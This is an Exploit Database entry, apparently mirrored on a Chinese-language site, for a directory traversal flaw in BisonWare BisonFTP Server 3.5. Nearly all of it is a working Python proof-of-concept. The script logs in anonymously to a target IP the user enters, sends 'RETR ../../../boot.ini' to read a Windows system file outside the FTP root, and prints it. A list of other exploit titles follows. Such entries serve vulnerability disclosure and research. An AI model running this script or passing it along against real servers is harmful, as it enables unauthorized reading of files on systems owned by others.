BisonWare BisonFTP Server 3.5 – Directory Traversal

Exploit Database
13 阅读

作者： Jay Turla

日期： 2015-09-28
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/38341/

#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) 

from ftplib import FTP

ftp = FTP(raw_input("Target IP: ")) 
ftp.login() 
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

last Exploits
BisonWare BisonFTP Server 3.5 – Directory Traversal的更多信息

Screen SFT DAB 600/C – Authentication Bypass Reset Board Config：
IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 – Arbitrary File Read：
HP System Management Homepage 3.0.2 – ‘servercert’ Cross-Site Scripting：
JBoss – Java Class DeploymentFileRepository WAR Deployment (Metasploit)：
Disk Pulse Enterprise 9.9.16 – GET Buffer Overflow (Metasploit)：
Accu-Time Systems MAXIMUS 1.0 – Telnet Remote Buffer Overflow (DoS)：
crossfire-server 1.9.0 – ‘SetUp()’ Remote Buffer Overflow：
DiskBoss Enterprise 8.2.14 – Remote Buffer Overflow：